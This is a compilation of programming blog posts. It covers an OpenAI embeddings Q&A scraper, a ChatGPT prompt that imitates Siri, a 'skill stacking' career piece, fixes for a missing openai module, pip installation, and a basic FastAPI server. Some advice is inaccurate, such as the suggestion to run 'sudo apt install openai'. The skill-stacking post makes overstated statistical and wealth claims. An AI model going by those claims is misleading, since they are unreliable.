        # If the number of tokens in the current sentence is greater than the max number of
        # tokens, go to the next sentence
        if token > max_tokens:
            continue

        # Otherwise, add the sentence to the chunk and add the number of tokens to the total
        chunk.append(sentence)
        tokens_so_far += token + 1

    return chunks

shortened = []

# Loop through the dataframe
for row in df.iterrows():
    # If the text is None, go to the next row
    if row[1]['text'] is None:
        continue

    # If the number of tokens is greater than the max number of tokens, split the text into chunks
    if row[1]['n_tokens'] > max_tokens:
        shortened += split_into_many(row[1]['text'])

    # Otherwise, add the text to the list of shortened texts
    else:
        shortened.append(row[1]['text'])

################################################################################
### Step 9
################################################################################

df = pd.DataFrame(shortened, columns=['text'])
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x)))
df.n_tokens.hist()

################################################################################
### Step 10
################################################################################

# Note that you may run into rate limit issues depending on how many files you try to embed
# Please check out our rate limit guide to learn more on how to handle this: https://platform.openai.com/docs/guides/rate-limits
df['embeddings'] = df.text.apply(lambda x: openai.Embedding.create(input=x, engine='text-embedding-ada-002')['data'][0]['embedding'])
df.to_csv('processed/embeddings.csv')
df.head()

################################################################################
### Step 11
################################################################################

df = pd.read_csv('processed/embeddings.csv', index_col=0)
df['embeddings'] = df['embeddings'].apply(eval).apply(np.array)
df.head()

################################################################################
### Step 12
################################################################################

def create_context(question, df, max_len=1800, size="ada"):
    """
    Create a context for a question by finding the most similar context from the dataframe
    """

    # Get the embeddings for the question
    q_embeddings = openai.Embedding.create(input=question, engine='text-embedding-ada-002')['data'][0]['embedding']

    # Get the distances from the embeddings
    df['distances'] = distances_from_embeddings(q_embeddings, df['embeddings'].values, distance_metric='cosine')

    returns = []
    cur_len = 0

    # Sort by distance and add the text to the context until the context is too long
    for i, row in df.sort_values('distances', ascending=True).iterrows():
        # Add the length of the text to the current length
        cur_len += row['n_tokens'] + 4

        # If the context is too long, break
        if cur_len > max_len:
            break

        # Else add it to the text that is being returned
        returns.append(row["text"])

    # Return the context
    return "\n\n###\n\n".join(returns)

def answer_question(
    df,
    model="text-davinci-003",
    question="Am I allowed to publish model outputs to Twitter, without a human review?",
    max_len=1800,
    size="ada",
    debug=False,
    max_tokens=150,
    stop_sequence=None
):
    """
    Answer a question based on the most similar context from the dataframe texts
    """
    context = create_context(question, df, max_len=max_len, size=size)

    # If debug, print the raw model response
    if debug:
        print("Context:\n" + context)
        print("\n\n")

    try:
        # Create a completion using the question and context
        response = openai.Completion.create(
            prompt=f"Answer the question based on the context below, and if the question can't be answered based on the context, say \"I don't know\"\n\nContext: {context}\n\n---\n\nQuestion: {question}\nAnswer:",
            temperature=0,
            max_tokens=max_tokens,
            top_p=1,
            frequency_penalty=0,
            presence_penalty=0,
            stop=stop_sequence,
            model=model,
        )
        return response["choices"][0]["text"].strip()
    except Exception as e:
        print(e)
        return ""

################################################################################
### Step 13
################################################################################

print(answer_question(df, question="What day is it?", debug=False))
print(answer_question(df, question="What is our newest embeddings model?"))

How to Run This Code?

This program is a Python script that scrapes text from a website, processes it, and then uses OpenAI’s language models to answer questions based on the scraped text.

All of the following explanations refer to the original code project on GitHub here.

Here’s a step-by-step guide on how to use it:

  1. Install the required packages: The script uses several Python packages, including requests, BeautifulSoup, pandas, and openai. You can install these packages by running pip install -r requirements.txt in the directory where the script is located.
  2. Set the website to scrape: In the script, you can specify the website to scrape by setting the domain and full_url variables in Step 1. The domain variable should be the root domain of the website (e.g., “example.com”), and the full_url variable should be the full URL of the website (e.g., “https://www.example.com/“).
  3. Run the script: You can run the script in a Python environment by executing python script.py in the directory where the script is located.
  4. Wait for the scraping to complete: The script will take some time to scrape the website and save the text files to disk. You can monitor the progress by looking at the console output.
  5. Ask questions: After the scraping is complete, you can use the answer_question function in Step 12 to ask questions based on the scraped text. The function takes in a dataframe containing the scraped text, a question to ask, and several optional parameters. You can modify the question and other parameters to suit your needs.

Note that the script is intended as a demonstration of how to use OpenAI’s language models to answer questions based on scraped text, and may require modification to work with different websites or to answer different types of questions. It also requires an OpenAI API key to use. You can sign up for an API key on the OpenAI website.

What Is an Embedding in This Context?

💡 In natural language processing, an embedding is a way to represent words or phrases as numerical vectors. These vectors capture semantic and contextual information about the words and phrases, and can be used to train machine learning models for various tasks such as text classification, sentiment analysis, and question answering.

In this script, the embeddings are created using OpenAI’s language models, and they are used to encode the text from the scraped web pages into a numerical format that can be analyzed and searched efficiently.

The embeddings are created by feeding the text through OpenAI’s text-embedding-ada-002 engine, which is designed to create high-quality embeddings for a wide variety of text-based applications.

The resulting embeddings are stored in the DataFrame and used to find the most similar context to a question in order to provide accurate and reliable answers.
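Under the hood, "finding the most similar context" is just a cosine comparison between the question's embedding vector and each stored embedding vector. Here is a minimal sketch of that comparison using plain NumPy, with toy 3-dimensional vectors standing in for real 1536-dimensional ada-002 embeddings:

```python
import numpy as np

def cosine_similarity(a, b):
    # Cosine similarity: dot product of the vectors divided by the product of their norms
    return np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b))

# Toy 3-dimensional "embeddings", real ada-002 vectors have 1536 dimensions
question  = np.array([1.0, 0.0, 0.0])
context_a = np.array([0.9, 0.1, 0.0])   # semantically close to the question
context_b = np.array([0.0, 1.0, 0.0])   # unrelated

# The closer vector wins the similarity ranking
print(cosine_similarity(question, context_a) > cosine_similarity(question, context_b))  # True
```

The `create_context` function in Step 12 does the same thing at scale: it ranks all stored chunks by cosine distance to the question and keeps the closest ones until the token budget is spent.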

👉 Recommended: How to Install OpenAI in Python?

If you want to improve your web scraping skills, check out the following course on the Finxter academy:

Posted on Leave a comment

How I Built a Virtual Assistant like Siri using ChatGPT Prompting (No Code!)

5/5 – (2 votes)

Siri sucks. 😞

I am a Siri user, and Siri fails me more than it performs for me. It doesn’t understand chained commands.

Project Idea: Recreate Siri Using ChatGPT

This got me thinking: “What if I could repurpose ChatGPT to work like Siri?” Before I show you what the prompt looks like, here is what the chatbot can recognise in natural language:

  • Increase volume
  • Decrease volume
  • Play movie
  • Pause or stop the movie
  • Open an app
  • Book a movie or movie ticket
  • Play song
  • Book a cab
  • Call someone
  • Set a reminder
  • Send a message
  • Set an alarm
  • Open a website
  • Get directions
  • Check the weather

To trigger these commands, the user needed to begin the instruction with "Hey Nik".

Let me begin by showing you the most complicated instruction it can handle:

Prompt First Trial – Not Perfect Yet

Nik: Assume it’s sunny. Hey Nik check the weather for me and if it’s sunny book a cab to go to the beach, play song california love by 2Pac

ChatGPT: Hey there! The weather today is sunny. Sure, I can check the weather for you and book a cab to the beach if it’s sunny. Here are the commands:

[WEATHER] [OPENAPP UBER] [PLAYSONG CALIFORNIA LOVE BY 2PAC]

Please note that the cab booking will not be completed as this is a simulated environment.

ChatGPT is not aware of my environment, hence I had to tell it that it’s sunny. Then I start with "Hey Nik...". In contrast, Google Assistant and Siri cannot handle this.

After a good deal of prompt engineering, I came up with the following prompt that could be used by an app to not only detect user meaning but also respond accordingly — without needing to create a single line of code to accomplish this magic!

ChatGPT truly can be used as the heart of many applications — not just to create them!

Final Prompt

You can copy and paste this prompt in case you want to reuse it to build your own Siri replacement:

Nik: I want you to be an interactive chatbot that responds to predefined instructions. The instructions and their respective commands are: Increase volume: [INCREASEVOLUME] Decrease volume: [DECREASEVOLUME] Play movie [MOVIE NAME]: [PLAYMOVIE [MOVIE NAME]] Pause or stop the movie: [STOPMOVIE] Open an app [APP NAME]: [OPENAPP [APP NAME]] Book a movie or movie ticket: [OPENAPP BOOKMYSHOW] Play song [song or artist name]: [PLAYSONG [song or artist name]] Book a cab: [OPENAPP UBER] Call someone [NAME]: [CALL [NAME]] Set a reminder [TIME] [REMINDER]: [SETREMINDER [TIME] [REMINDER]] Send a message [NAME] [MESSAGE]: [SENDMESSAGE [NAME] [MESSAGE]] Set an alarm - [SETALARM [time]] Open a website - [OPEN [website name]] Get directions - [DIRECTIONTO [location]] Check the weather - [WEATHER] Here are some conditions to consider: If the instruction includes a number or percentage when using INCREASEVOLUME or DECREASEVOLUME, append it to the command. If the instruction includes the name of an app when using OPENAPP, append it to the command. To trigger these commands, begin the instruction with "Hey Nik". Please note that commands will be in square brackets, with spaces removed except for messages or names. Your response should contain an acknowledgement in English and below it should be the sequence of commands. After you display the commands do not print anything else.

I came up with the following commands on the first attempt:

  • Increase volume: [INCREASEVOLUME]
  • Decrease volume: [DECREASEVOLUME]
  • Play movie [MOVIE NAME]: [PLAYMOVIE [MOVIE NAME]]
  • Pause or stop the movie: [STOPMOVIE]
  • Open an app [APP NAME]: [OPENAPP [APP NAME]]
  • Book a movie or movie ticket: [OPENAPP BOOKMYSHOW]
  • Play song [song or artist name]: [PLAYSONG [song or artist name]]
  • Book a cab: [OPENAPP UBER]

After I perfected the results, I wanted to see if ChatGPT could add more commands, so I tried the following prompt:

Refinement Prompt

Nik: Can you add more commands in the style given to the prompt. Take inspiration from "ok google" and "hey siri". Please write in English language.

ChatGPT: Sure, I can add more commands in the style given to the prompt! Here are some additional commands you can use:

  • To set a reminder, say "Hey Nik, set a reminder for [time] to [task]". For example, "Hey Nik, set a reminder for 2pm to attend a meeting".
  • To check the weather, say "Hey Nik, what's the weather like today?".
  • To get directions, say "Hey Nik, how do I get to [location]?". For example, "Hey Nik, how do I get to Central Park?".
  • To set an alarm, say "Hey Nik, set an alarm for [time]". For example, "Hey Nik, set an alarm for 7am".
  • To send a message, say "Hey Nik, send a message to [contact name]". You will then be prompted to dictate the message and confirm before sending.
  • To open a website, say "Hey Nik, open [website name]". For example, "Hey Nik, open Google".

Remember to begin each command with "Hey Nik" for the chatbot to respond. I hope these additional commands are helpful!

Nik: Ok now generate the original prompt with the newly added commands. Please write in English language.

My Personal Considerations and Findings Using This Prompt

I am impressed with ChatGPT’s ability to generate a more user-friendly and straightforward set of commands. And it also kept modifying my original prompt to include these commands. 

But, I realized that there were some conditions that I needed to consider, such as:

  • If the instruction includes a number or percentage when using INCREASEVOLUME or DECREASEVOLUME, append it to the command.
  • If the instruction includes the name of an app when using OPENAPP, append it to the command.

With these conditions in mind, I combined the original set of commands with the new commands generated by ChatGPT and added the necessary conditions to create a more comprehensive and user-friendly prompt.

As I developed the chatbot, I discovered that one of its most significant advantages over Siri was its ability to handle an unlimited set of inputs. Siri, on the other hand, works with one command at a time, which can be limiting for users who want to execute multiple tasks in one go.

Here are some examples of user inputs and their respective responses:

User Input: Hey Nik, play movie The Shawshank Redemption
Response: [PLAYMOVIE The Shawshank Redemption]

User Input: Hey Nik, increase volume by 50 percent
Response: [INCREASEVOLUME 50 percent]

User Input: Hey Nik, send a message to John saying I will be there in 10 minutes
Response: [SENDMESSAGE John I will be there in 10 minutes]

User Input: Hey Nik, what is the weather like in New York?
Response: [WEATHER New York]

Here is an example of the user input and response for the “play song” command:

User input: Hey Nik, play song Shape of You by Ed Sheeran
Response: Playing Shape of You by Ed Sheeran
Command: [PLAYSONG Shape of You by Ed Sheeran]

And here is an example of the user input and response for the "open an app" command:

User input: Hey Nik, open app Netflix
Response: Opening Netflix
Command: [OPENAPP NETFLIX]

How to Deploy This

To deploy it as an app, you can use the ChatGPT API + Promptable + any no-code app builder. The app can be deployed on iPhone, but there are many permissions that need to be worked out.

A similar version of this may work on Android as it is more open.
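Whichever builder you use, the glue logic stays the same: extract the bracketed commands from ChatGPT's reply and hand them to the operating system. A minimal sketch in Python (the function name extract_commands is my own, not part of any API):

```python
import re

def extract_commands(reply):
    # Commands appear in square brackets, e.g. [WEATHER] or [PLAYSONG Shape of You]
    return re.findall(r"\[([A-Z]+[^\[\]]*)\]", reply)

reply = ("Hey there! The weather today is sunny. Here are the commands:\n"
         "[WEATHER] [OPENAPP UBER] [PLAYSONG CALIFORNIA LOVE BY 2PAC]")
print(extract_commands(reply))
# ['WEATHER', 'OPENAPP UBER', 'PLAYSONG CALIFORNIA LOVE BY 2PAC']
```

Each extracted string would then be mapped to a platform call (volume, app launch, etc.), which is exactly the part that needs the OS permissions mentioned above.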

👉 Recommended: ChatGPT at the Heart – Building a Movie Recommendation Python Web App

Posted on Leave a comment

A Simple Hack to Becoming the World’s Best Person in Something as an Average Guy

5/5 – (1 vote)

Millionaires are made at the top of the income distribution.

For example, have a look at the following Pareto distribution exemplifying how only the top sports players make all the money:

If you want to earn a million dollars quickly, you need to become one of the top people in the world at something the market values.

Sounds hard? You don’t actually have the skills to become a top person in a field such as sports, coding, or business?

Don’t worry — becoming one of the best people at something is actually easy. Everybody can do it — with the right strategy. I call it “skills stacking”. This article explains the simple idea, so let’s get started! 👇

Skills Stacking – Basic Idea

The idea of becoming the best person in the world can be a daunting task, but it’s not an impossible one. Many people believe that to achieve greatness, one must have extraordinary talent or be born with a special gift. However, this is a myth. It’s possible to become the best person in the world by focusing on developing a combination of skills rather than a single skill.

💡 Skill stacking is improving a combination of 6-8 skills individually so that you become one of the top people in your field in the combination of these skills. The combination of skills must all be important in your line of work.

For example, suppose an average guy is in the top 10% of three different skills. In that case, he moves to the top 10% * 10% * 10% = 0.1% in the combination of those three skills. He is the most skilled person out of 1000 randomly chosen persons, in that combination of skills. This means that by becoming merely good in three different areas, an average guy can become one of the best people in his field.
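The arithmetic behind this claim is easy to verify in a few lines of Python (assuming the skills are statistically independent):

```python
def combined_top_fraction(percentiles):
    # Being in the top fraction p of each independent skill puts you in the
    # top p1 * p2 * ... * pn of the population for the combination of skills.
    result = 1.0
    for p in percentiles:
        result *= p
    return result

# Top 10% in three skills -> top 0.1% of the combination
print(round(combined_top_fraction([0.10, 0.10, 0.10]), 6))   # 0.001

# Equivalently: the most skilled person out of 1000 randomly chosen people
print(round(1 / combined_top_fraction([0.10, 0.10, 0.10])))  # 1000
```

The independence assumption is optimistic (skills often correlate), but the direction of the effect holds: every added skill multiplies your rarity.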

Example of skill stacking: Learning seven skills can be enough to become the best out of 1.3 billion people!

In the spreadsheet, a coder focuses on learning

One special skill of this coder is smiling, which they use heavily in their day-to-day work to increase customer satisfaction and create value. Don’t underestimate the simple talents!

The coder may just offer their freelancing services in the area of OpenAI and prompt engineering using Python — and invest their income in the stock market. And they can be wildly successful with this strategy, easily reaching multi-millionaire status!

👉 Recommended: How to Become a Millionaire – The Simple Math

The concept of going to the top in a combination of skills is simple yet powerful.

How to Stack Skills?

So, how does one go about developing a combination of skills to become the best person in the world?

The first step is to identify the skills you want to develop. These skills should be different but complementary, meaning that they should enhance each other.

For example, if you’re interested in becoming a great public speaker, you might also want to work on your writing skills and your ability to connect with people.

Once you have identified the skills you want to develop, the next step is to start practicing. This requires dedication, hard work, and a willingness to learn from your mistakes.

However, it’s not so hard to reach the top 10% or so in a skill — just read a couple of books about this skill and you have done more than most people ever will!

A Few Words on Persistence

Another essential factor in becoming the best person in the world is persistence. Success is rarely achieved overnight, and setbacks are inevitable. However, those who are persistent and keep pushing through their failures are the ones who ultimately succeed. As the saying goes, “practice makes perfect,” and the more you practice, the better you become.

In addition to developing a combination of skills and persistence, it’s also essential to seek out opportunities to showcase your skills. Whether it’s through public speaking engagements, writing articles, or participating in competitions, putting yourself out there is crucial to becoming the best person in the world. This not only helps you gain recognition for your skills but also helps you learn from others and grow as a person.

👉 Recommended: Intelligence vs Persistence – What’s More Important for Your Coding Success?

Conclusion

In conclusion, becoming the best person in the world as an average guy is possible. It requires a combination of skills, persistence, and the willingness to take risks and put yourself out there.

By focusing on developing a variety of skills, an average guy can move to the top of his chosen field and become one of the best people in the world.

Action Steps: Identify the skills you want to develop, put in the time and effort required, and don’t give up.

Who knows, you might just end up surprising yourself and the world!

Bonus – Exponential Skill Stacking

A great way to increase your odds is to stack “exponential skills”, i.e., skills that become exponentially more demanded yearly.

  • Programming
  • Blockchain Development
  • Machine Learning
  • ChatGPT and OpenAI
  • Freelancing

By stacking these skills, your stack becomes more valuable over time, not less. You can master many exponential skills at the Finxter academy:

Posted on Leave a comment

ModuleNotFoundError: No Module Named OpenAI

5/5 – (1 vote)

Quick Fix: Python raises the ImportError: No module named 'openai' when it cannot find the library openai. The most frequent source of this error is that you haven’t installed openai explicitly with pip install openai. Alternatively, you may have different Python versions on your computer, and openai is not installed for the particular version you’re using.

Before I dive into the tutorial, try out one of the following solutions (quick fix):

# ✅ Python 2 or Virtual Environment
pip install openai

# ✅ Python 3
pip3 install openai

# ✅ Python 3.10
pip3.10 install openai

# ✅ If you get a Permission Error
sudo pip3 install openai

# ✅ If pip is not in your PATH environment variable
python -m pip install openai

# ✅ Python 3 if pip is not in your PATH
python3 -m pip install openai

# ✅ Python 3.10 if pip is not in your PATH
python3.10 -m pip install openai

# ✅ Anaconda
conda install -c conda-forge openai

Problem Formulation

You’ve just learned about the awesome capabilities of the openai library and you want to try it out, so you start your code with the following statement:

import openai

This is supposed to import the OpenAI library into your (virtual) environment. However, it only throws the following ImportError: No module named 'openai':

>>> import openai
Traceback (most recent call last):
  File "<pyshell#6>", line 1, in <module>
    import openai
ModuleNotFoundError: No module named 'openai'

Solution Idea 1: Install Library OpenAI

The most likely reason is that Python doesn’t provide openai in its standard library. You need to install it first!

Before being able to import the OpenAI module, you need to install it using Python’s package manager pip. Make sure pip is installed on your machine.

To fix this error, you can run the following command in your Windows shell:

$ pip install openai

This simple command installs openai in your virtual environment on Windows, Linux, and macOS. It assumes that your pip version is up to date. If it isn’t, run the following two commands in your terminal, command line, or shell (there’s no harm in doing it anyway):

$ python -m pip install --upgrade pip
$ pip install openai

💡 Note: Don’t copy and paste the $ symbol. This just illustrates that you run it in your shell/terminal/command line.

Solution Idea 2: Fix the Path

The error might persist even after you have installed the openai library. This likely happens because pip is installed but doesn’t reside in a directory on your PATH. Although pip may be installed on your system, the script is unable to locate it, and therefore cannot install the library in the correct path.

To fix the problem with the path in Windows follow the steps given next.

Step 1: Open the folder where you installed Python by opening the command prompt and typing where python

Step 2: Once you have opened the Python folder, browse and open the Scripts folder and copy its location. Also verify that the folder contains the pip file.

Step 3: Now open the Scripts directory in the command prompt using the cd command and the location that you copied previously.

Step 4: Now install the library using the pip install openai command. Here’s an analogous example:

After following the above steps, execute your script once again, and you should get the desired output.

Other Solution Ideas

  • The ModuleNotFoundError may appear due to relative imports. You can learn everything about relative imports and how to create your own module in this article.
  • You may have mixed up Python and pip versions on your machine. In this case, to install openai for Python 3, you may want to try python3 -m pip install openai or even pip3 install openai instead of pip install openai
  • If you face this issue server-side, you may want to try the command pip install --user openai
  • If you’re using Ubuntu, you may want to try this command: sudo apt install openai
  • You can check out our in-depth guide on installing openai here.
  • You can also check out this article to learn more about possible problems that may lead to an error when importing a library.

Understanding the “import” Statement

import openai

In Python, the import statement serves two main purposes:

  • Search the module by its name, load it, and initialize it.
  • Define a name in the local namespace within the scope of the import statement. This local name is then used to reference the accessed module throughout the code.
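Both effects are easy to observe in the interactive shell, shown here with the standard library module math instead of openai:

```python
import math           # searches for, loads, and initializes the module

# The name "math" is now bound in the local namespace:
print(math.sqrt(16))  # 4.0

# An alias binds the same module object under a different local name:
import math as m
print(m is math)      # True
```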

What’s the Difference Between ImportError and ModuleNotFoundError?

Python defines an error hierarchy, so some error classes inherit from other error classes. In our case, the ModuleNotFoundError is a subclass of the ImportError class.

You can see this in this screenshot from the docs:

You can also check this relationship using the issubclass() built-in function:

>>> issubclass(ModuleNotFoundError, ImportError)
True

Specifically, Python raises the ModuleNotFoundError if the module (e.g., openai) cannot be found. If it can be found, there may be a problem loading the module or some specific files within the module. In those cases, Python would raise an ImportError.

If an import statement cannot import a module, it raises an ImportError. This may occur because of a faulty installation or an invalid path. In Python 3.6 or newer, this will usually raise a ModuleNotFoundError.
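Because of this subclass relationship, an except clause for ImportError also catches a ModuleNotFoundError. The following sketch imports a deliberately nonexistent module (the name is made up) to demonstrate:

```python
try:
    import some_module_that_does_not_exist  # made-up name, not installed anywhere
except ImportError as exc:  # also catches the ModuleNotFoundError subclass
    caught = type(exc).__name__

print(caught)  # ModuleNotFoundError
```

This is why legacy code that catches ImportError keeps working on Python 3.6+ even though the interpreter now raises the more specific subclass.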

Related Videos

The following video shows you how to resolve the ImportError:

YouTube Video

The following video shows you how to import a function from another folder—doing it the wrong way often results in the ModuleNotFoundError:

YouTube Video

How to Fix “ModuleNotFoundError: No module named ‘openai’” in PyCharm

If you create a new Python project in PyCharm and try to import the openai library, it’ll raise the following error message:

Traceback (most recent call last):
  File "C:/Users/.../main.py", line 1, in <module>
    import openai
ModuleNotFoundError: No module named 'openai'

Process finished with exit code 1

The reason is that each PyCharm project, per default, creates a virtual environment in which you can install custom Python modules. But the virtual environment is initially empty—even if you’ve already installed openai on your computer!

Here’s a screenshot exemplifying this for the pandas library. It’ll look similar for openai.

The fix is simple: Use the PyCharm installation tooltips to install OpenAI in your virtual environment—two clicks and you’re good to go!

First, right-click on the openai text in your editor:

Second, click “Show Context Actions” in your context menu. In the new menu that arises, click “Install OpenAI” and wait for PyCharm to finish the installation.

The code will run after your installation completes successfully.

As an alternative, you can also open the Terminal tool at the bottom and type:

$ pip install openai

If this doesn’t work, you may want to set the Python interpreter to another version using the following tutorial: https://www.jetbrains.com/help/pycharm/2016.1/configuring-python-interpreter-for-a-project.html

You can also manually install a new library such as openai in PyCharm using the following procedure:

  • Open File > Settings > Project from the PyCharm menu.
  • Select your current project.
  • Click the Python Interpreter tab within your project tab.
  • Click the small + symbol to add a new library to the project.
  • Now type in the library to be installed, in our example openai, and click Install Package.
  • Wait for the installation to terminate and close all popup windows.

Here’s an analogous example:

Here’s a full guide on how to install a library on PyCharm.


How to Install Pip? 5 Easy Steps


In this article, I’ll quickly guide you through the installation steps for Python’s package installer pip. But first things first: 👇

What Is Pip?

✅ pip is the package installer for Python used to install and manage software packages (also known as libraries or modules) written in Python. pip makes it easy to install, upgrade, and uninstall packages in your Python environment.

When you install a package with pip, it automatically downloads and installs any dependencies required by the package, making it very convenient for managing your Python projects. You can use pip from the command line but it also integrates with popular development environments like Jupyter, PyCharm, and Visual Studio Code.

Is Pip Already Included in Python?

pip is included with Python distributions from version 3.4 onwards, so if you have a recent version of Python installed, you should already have pip.

✅ Recommended: How to Check Your Python Version?

If you don’t have pip installed, you can easily install it using the steps outlined as follows:

5 Steps to Install Pip Easily

To install pip in Python, follow these steps:

  1. Check if pip is already installed by running the command "pip -V" in your command prompt or terminal. If you see a version number, pip is already installed. If not, proceed to step 2.
  2. Download the get-pip.py script from the official Python website (see below).
  3. Open a command prompt or terminal and navigate to the directory where you downloaded the get-pip.py script.
  4. Run the command python get-pip.py to install pip.
  5. Verify that pip is installed by running the command pip -V.

That’s it! You should now have pip installed and ready to use in your Python environment.

In case you weren’t able to complete step 2, here’s how to do it quickly:

How to Download get-pip.py from Official Python?

To download the get-pip.py script from the official Python website, follow these steps:

  1. Open a web browser and go to the following URL: https://bootstrap.pypa.io/get-pip.py
  2. Right-click on the page and select “Save As” (or similar option) to download the file.
  3. Choose a directory to save the file to and click “Save”.
  4. Once the download is complete, navigate to the directory where you saved the file.

Alternatively, you can use the following command in your command prompt or terminal to download the file directly:

curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py

This will download the get-pip.py file to your current working directory.

Are There Other Ways to Install Pip?

Yes, there are a few other ways to install pip depending on your operating system and Python distribution.

Here are the three most common methods:

  1. Package managers: Many Linux distributions include pip in their package repositories, which means you can use your distribution's package manager to install it. For example, on Ubuntu, you can use the following command: sudo apt-get install python3-pip (older releases used the package name python-pip).
  2. Python installers: Some Python distributions come with pip pre-installed, such as Anaconda and ActivePython. If you are using one of these distributions, you should already have pip installed.
  3. Python package installer: Another way to install pip is by using the ensurepip module, which is included with Python since version 3.4. You can use the following command: python -m ensurepip --default-pip.

Regardless of the method you choose, it’s always a good idea to verify that pip is installed and working correctly by running the command pip -V.
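Besides running pip -V in a terminal, you can verify from inside Python that pip is importable by the current interpreter. A small sketch using only the standard library:

```python
import importlib.util

# find_spec() returns None if the module cannot be found.
if importlib.util.find_spec("pip") is not None:
    print("pip is installed for this interpreter")
else:
    print("pip is missing; run get-pip.py or python -m ensurepip")
```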

How to Upgrade Pip?

To upgrade pip to the latest version, follow these steps:

Step 1: Open a command prompt or terminal and enter the following command to upgrade pip:

python -m pip install --upgrade pip

The previous command was for Linux or macOS. For Windows, you may want to use:

 py -m pip install --upgrade pip

Step 2: Depending on your system configuration, you may need to run this command with administrator privileges. On Linux or macOS, you can use sudo to run the command as root, like this:

sudo python -m pip install --upgrade pip

Step 3: pip will download and install the latest version of itself. Once the upgrade is complete, you can verify that pip is up to date by running the command:

pip --version

This will display the version number of the newly installed pip.


That’s it! You should now have the latest version of pip installed on your system.

Note that it’s a good idea to keep pip up to date to take advantage of bug fixes, security updates, and new features. You can check for updates to individual packages installed with pip using the pip list --outdated command, and upgrade them with pip install --upgrade <package>.
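If you prefer checking a single package's version from inside Python, the standard library's importlib.metadata (Python 3.8+) works too. This is a sketch, with "pip" as the example distribution name:

```python
from importlib.metadata import version, PackageNotFoundError

def installed_version(dist_name):
    """Return the installed version string of a distribution, or None."""
    try:
        return version(dist_name)
    except PackageNotFoundError:
        return None

print(installed_version("pip"))  # e.g. '23.0.1', or None if pip is missing
```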

✅ Recommended: Pip Commands — The Ultimate Guide


BrainWaves P2P Social Network – How I Created a Basic Server


Welcome back to the Brainwaves P2P project, or at least my take on it :-).

The previous article was a theoretical explanation of how I envision this project. It is now time to start laying the groundwork!

I learn as I go…

As some of you might have guessed already, I’m a completely self-taught coder. Because of that, I’m sure many professionals might not agree with how I code.

I accept that and will welcome any constructive criticism. I have been learning non-stop since I started this project. I assume this will not slow down anytime soon. YouTube is my main source of knowledge as I learn best when seeing something done. I am, in other words, a visual learner. I found an article that explains it well here.

Articles on various sites are the other half of how I learn new concepts in coding. That is how I found Finxter :-).

So to sum it up, my code is far from perfect, and I will never claim it is. This is my take on trying to solve this puzzle. I actually look forward to alternative approaches!

You can open issues on my GitHub if you want to address something.

Now that we all know where we stand let us dive right in! How to build a server for our peer-to-peer social network app?

Flask vs FastAPI

In the previous article, I mentioned that I want to use FastAPI to build the relay server, as opposed to Flask. As I have done before and will do again, I asked ChatGPT about the differences between Flask and FastAPI.

🤖 Flask vs FastAPI: Flask is based on the Werkzeug WSGI (Web Server Gateway Interface) toolkit, which is synchronous by default. However, Flask can still be used to build asynchronous applications; you will need a third-party library like gevent or asyncio. With these libraries, Flask can use coroutines and event loops to handle I/O operations asynchronously. FastAPI, on the other hand, is designed to be fully asynchronous from the ground up. It uses the async/await syntax of Python to write asynchronous code and is based on the ASGI (Asynchronous Server Gateway Interface) specification. FastAPI uses the Starlette framework as its foundation; the framework provides a high-performance event loop and asynchronous request handlers.

Both the speed and the asynchrony determined my choice of FastAPI.

Those of you familiar with Flask will know about its built-in development server. As FastAPI doesn’t have this, we’ll need to install a separate server.

Uvicorn Server

This is where I encountered my first small hiccup. I code on Windows (I know, sue me 😝), and I wanted to use Uvicorn with its high-performance uvloop event loop. As uvloop only runs on Unix-like systems, I needed to get it to function in WSL.

I’ll not go into all the details here, but I could write something about it if anyone has an interest in it. Let me know!

After getting Uvicorn to function as it should, we can continue. It is important to remember that the Python interpreter on WSL does not share anything with its Windows counterpart. This means that you either need two separate virtual environments or that you install pip packages for each OS.
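A quick sanity check for this: printing the interpreter path and version tells you immediately whether a script runs under WSL or Windows.

```python
import sys

# Under WSL this prints a Linux path such as /usr/bin/python3;
# under Windows it prints a path ending in python.exe.
print(sys.executable)
print(sys.version)
```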

Creating Basic FastAPI App

Once all this annoying prep work is done, creating a basic FastAPI app is very easy. We first import FastAPI as below:

from fastapi import FastAPI

All you need to do afterward is define the basic app and create an endpoint.

#---APP INIT---#
app = FastAPI()

@app.get("/")
async def root():
    return {"message": "Hello World"}

To get this to run, you need to navigate to the working directory of your FastAPI project via WSL. Afterward, you call the Uvicorn server. The command below assumes you called your Python file main.py!

uvicorn main:app --reload

I usually run the Uvicorn server in a separate terminal instance of WSL.

That way, I can leave it on and test any changes I make immediately. Later, when I’ll be working on the client also, I can split the terminal. You can then make API calls through the client terminal window. FastAPI’s response in the server WSL window is then visible immediately.

Receiving “Hello World” from Server

If you now navigate to 127.0.0.1:8000 you should get a JSON response with the "Hello World" we returned in the endpoint above. We will change this endpoint's function later, but for now, it proves our API is working.

For the API server, I have the following layout in mind. It might change throughout the development process. I currently foresee two endpoints that do not require the user to be logged in with a JWT token. The first will be to get that token, and the second to register a new user. Everything else will require the user to be authenticated.

I stated earlier that I would change the root’s endpoint function. Its new role is now to allow a user to request a JWT token. The token is only granted after providing a correct combination of username and password. This requires a dedicated set of both helper functions and Pydantic models to work.

I will go into this in another article, as it requires much explaining :-). It is something I am still learning myself.

Endpoint Layout

The current layout of my endpoints at a high level is the following:

#---OPEN ENDPOINTS---#
# Root route to get token
@app.post("/", response_model=Token)
# Route to create a new user
@app.post("/api/v1/users")

#---AUTH ENDPOINTS---#
# Route to get all current users and their attributes (development only)
@app.get("/api/v1/users")
# Route to test if the token is valid, used while authenticating
@app.get("/api/v1/token-test")
# Route to get all thoughts/messages created by a certain user
@app.get("/api/v1/thoughts/{username}")
# Route to return all thoughts/messages containing the query string
@app.get("/api/v1/thoughts/{query_str}")
# Route to create a new message/thought
@app.post("/api/v1/thoughts")
# Route to return all info about the current user (like a user profile)
@app.get("/api/v1/me", response_model=User)

The current setup should allow for the barebones functionality of the application, at least from a server point of view. The routes above and/or their functions are liable to change during development. I do find it helps to have a visual reminder of what I am working toward, which is why I created this high-level layout. As you might recall, I am a visual learner 😀.

Database Considerations

I will dedicate the last part of this article to the database. As we need to store users, user credentials, and messages/tweets somewhere, a database is a must.

If you have read any of my previous articles, you will know I like Deta a lot.

Their NoSQL databases work great for development. They recently evolved into Deta Space. This change makes their ecosystem even more interesting for developers. The fact that they are free is also important for a single developer coding this app on his own time 😝. Make sure to check them out!

The next article will focus on both the database code and the Pydantic models we will need to get our API to function.

As always, feel free to ask me questions or pass suggestions! And check out the GitHub repository for participation!

